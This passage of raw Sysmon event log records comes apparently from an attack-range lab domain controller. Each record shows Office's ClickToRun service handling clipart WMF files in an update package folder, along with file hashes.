Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00476_.WMFMD5=636BF7408FFC98729BEECFB05F0393A7,SHA256=AF2AC53F893681E489DD7A4AFBE82A0EE469FAD4D7DF4DEC531A5315FFDF924C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00466_.WMFMD5=D0DE1371EF6814E06020AE81AF56C95B,SHA256=64E06DA470774A12CB6A28014B9667CBA7C9F147FACDFDA8595526926F52676F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00454_.WMFMD5=FB62D640DFA3A64945796B91E5AC6425,SHA256=436030813AD9D1A7FE46A34411DE2741B261C6576CB15550611E1E63EB355757,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00453_.WMFMD5=5DCD6AD7DCFB5C2FB220F8CCC4BE3A0E,SHA256=9E7FC1783C8201C31DA572BA588B3E0C91958DFC2175947844C292EF539DBB06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066578Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00452_.WMFMD5=8DC82EEED8CB1CF420EC34BB06AF647B,SHA256=49B6406C781D9B9AE3234E231FB13BB69D74DA9BA324DAB540FE88695D1496EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066577Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00444_.WMFMD5=CE79BDBD778B7C48AE8DE3F171F69704,SHA256=2F7141E3641990C7A99431055E5A21EB5C8DC30518342CAFDC3ED3D41F01B1B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066576Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00423_.WMFMD5=BA98EEF79B33552C9DACFF776EAF07E7,SHA256=C826472B173739648FC5EADF0F939BE5401071EBFF24728D080289429A7F7AB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066575Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00416_.WMFMD5=780D23077258C8271D3025C5DF79890D,SHA256=59E75A2D73E8F69FC2E2F244D8739BF07B5F2542C4E90EFCB893C4C5E56D5FA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066574Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00391_.WMFMD5=A27449E667392359D93B35785E612801,SHA256=EABFD8F4927A471D5D0EE950255567EF7C6A479B31D2538988D5E1B8B02DEBE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066573Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00390_.WMFMD5=6B3C1E7C6B08C5A240137F9E805EDE8D,SHA256=8E041821E25B3DE8468F3C2C54F737F525294706D649170C0F4196E3B0D790C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066572Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00382_.WMFMD5=AE1656C75BDFC1D8FCEEED8ABFEFBA40,SHA256=6F43C4846889BBB20652C59A89341D3900FED0E204DFCE3E6B82B1E07BD6ADC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066571Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00373_.WMFMD5=79578AD0E544892A0C7E7958C9825318,SHA256=54473ACF9A78CD667DBC566B185C3940E8A928A1A252226A9742CDE8E6DF91D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066570Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00367_.WMFMD5=752182003E3D9AB4E836A7F2523F4D7C,SHA256=720876354523D997217AA237B0CA41870516760E50EBF4B5F2A1D2474D976381,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066569Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00364_.WMFMD5=10CB9725C3A98EA1F534350924160BF1,SHA256=D2CC5D05380607AD2A2BA670E3257079167CF071DF575E460D16EF564A703EB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066568Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00352_.WMFMD5=32E1336858F72222F6E52545A82A4BBA,SHA256=14997CBAB5C342B2977F02A47C15DAB913A4F4CD97824FC4D68014B81ACC9AFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066567Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00350_.WMFMD5=A726A7D8CA7AABDFAD8B77738F3B09F2,SHA256=4957B376C1CD01B714BED65904E53E2F100D87CEFEA6F71B4A2A291E185661DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066566Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00345_.WMFMD5=405FBE795688FDBC84FC7B5A75CD12B7,SHA256=B4D21671DE5B7D23D6CEF7EB3AD8BEF112B14E0AFA18E528BFBAE4CE855FEE1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066565Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00333_.WMFMD5=22D6261A3487AE5EABD6896029AF0758,SHA256=A7003FC9384E523CEB9A94E1822B3F494D8DDA27EDEB456C8519773189120EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00305_.WMFMD5=8B26328784F4170BF6FC4DA54A62A49C,SHA256=509120F4E53D219C7C9EC18C7D55B16ED1553FFE12197919AEF0A0CFE7A2F20F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00299_.WMFMD5=B35CE95719EBE7BF974BB84D42760473,SHA256=5EE7AAEDA2006ED1DEB2556D8EEAEB2E0B1BBAAC5AC6B5B03CA153654F5E42BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00289_.WMFMD5=4FC0E68FB2A159C46BEBDD123F985250,SHA256=4BDAB37D90315A9AC6D82733F66B89C63D6D8A517797122DCB264EAA9736DDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00257_.WMFMD5=86FCD8F1035E56DCB17E2DD7D79B327D,SHA256=A02EA753CE4A0BA1118D6D749D30189E8AAFD0E79C0D6657818A538E87205AFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00223_.WMFMD5=D16F50FA4582E48DB9119653AF1606DA,SHA256=2FE536ECA582193CFCD64DF87DE9BEF39F36E9341FC0E301A9E04995D478B1A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00222_.WMFMD5=FEB32A1DBE3752E3202F318A38AFFF25,SHA256=618F0CB52D0D3243B96E1EA814E05CF58D1E90F770A404961E5DB7E1691271D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00221_.WMFMD5=42C33C97E31CD3EFAEE3B3DA89398969,SHA256=7FC8C6063AB0BB45DF80C3454C06A7D1F384E273CF33B07F83FCA53E2EE603BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00212_.WMFMD5=8EA26DA36DA8213FE6FBFC3F4AB73115,SHA256=D270B42E895A89BF90066B1517A82D94090A8F3DDF5DFD30B78EDA8D90971465,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00208_.WMFMD5=CA0F610078ECF5A2394494C28280155F,SHA256=338E10C23C463324C81BEAAFB09D5C3A3E506E8AC6C16D85E688A70198160F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00200_.WMFMD5=11D699313422DD868BBD39BDBA4CA0F8,SHA256=26A866554E0F4CE54D1C0661513352736ADCAB4768DC6D2174B275785CCCBECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00199_.WMFMD5=FF446CA6B2831B1A59D4FB592473F91E,SHA256=FC362D344B6FFDADB62589E4427C4985C6265BCD0E306413B0C264BEFCB4E4E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00197_.WMFMD5=84E4826AAB0956B1720B6DB8B9EF79E9,SHA256=6AB02C9710F58DEEC70892A188C423D051D94EAAFB6D290CC94470BED1C0B118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00194_.WMFMD5=8594BFDEE4F74EF83355328A901821DC,SHA256=5693A7F77C55C49548FF77C67D1DE49F27082BA8C454C7C6D31C66F042C691CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00192_.WMFMD5=10D1AA27DB06014EC39E3F91CF343D8C,SHA256=CF83F2FF1B435D811EECA7A3AEC527B40B0EC16D0321C873604CE425C4D68970,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00191_.WMFMD5=54EF231EDADE52E709C210881A10E7A1,SHA256=45E9D8A589E046F9B728A69BEE0B01D0809060884BF87D83E28C0D8393AC3346,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00190_.WMFMD5=84344673FE88BE462DE07E112332E53B,SHA256=A9476C30C1ACD8CE49F1C2EAD6C2F58DC1A2BDB2792BAE68021AD064B33E1DA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00183_.WMFMD5=CB0151A6EC87E961F5D4FE314397AD96,SHA256=DFC3C24FBC4FA8D7BCBD88F459FDAFA0EA46D38A7CB77963132FE3910B999A96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00177_.WMFMD5=373E95F646117CABA979EE42A645AD8C,SHA256=D3EA8AF9DA22DABA595F0131566B3102CAB5DD445FA0FF7DB2D27AF0015FAD28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.377{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00170_.WMFMD5=BDFF00D1D3173A0CD49441AF82FB6627,SHA256=08420C30F792765048424247860BD35D9A02D0C4173A163B14807A512584057B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00168_.WMFMD5=5D5DC94B984620C8F0746E7DE65FA4AD,SHA256=5B9081B72E484149CE9029600519C2328F678827D05F2E4D3E3388DBB2F9E5CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00166_.WMFMD5=010F9AFECC2699B9551DE4E3D1D45ED4,SHA256=7F83CF58E54B001AAC0AACD7726BCEF76F6A31F93AE17389EFF41902D05635F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00159_.WMFMD5=FD10D649F748F5C7F774E6D82870485A,SHA256=8DF1F9F18E075B14EDB10FCFA16EBC9744652B7E0C2521AD4997457E006C8ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00157_.WMFMD5=CAD580A92FA9A59DEB63DB5BB8365D65,SHA256=ADD523B58A0AAD2AD49E5B98A0431D6F114414FAAAEE5F8DE82CBEAF23D5831D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00152_.WMFMD5=45398BA0207D4F9CB301B29F0EADC7AA,SHA256=FF24EB1D8A4CDA74E28C391C9FDF969BC67415EB7B760C99D03E324C1E204D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00018_.WMFMD5=470D43B9D1C7873CDDA69487B978F7F8,SHA256=8FA30830A1B4AD53BC5910449529BB4FB79A8DF48DCC1753A92AEB2925334124,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SO00017_.WMFMD5=92E09082A53BEECFC5A4F129D3C3E5EB,SHA256=9B692C1230CD2CB435DAB9A8CA5C47349EC34131A1EBD93F466948829E507A60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\SL01565_.WMFMD5=73535C84EE3D2A689D06E38A4AC096E6,SHA256=56D9DB003E42A819F795DC88C1B1F770FD5952215493CCF108413B3BF432231D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:10.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 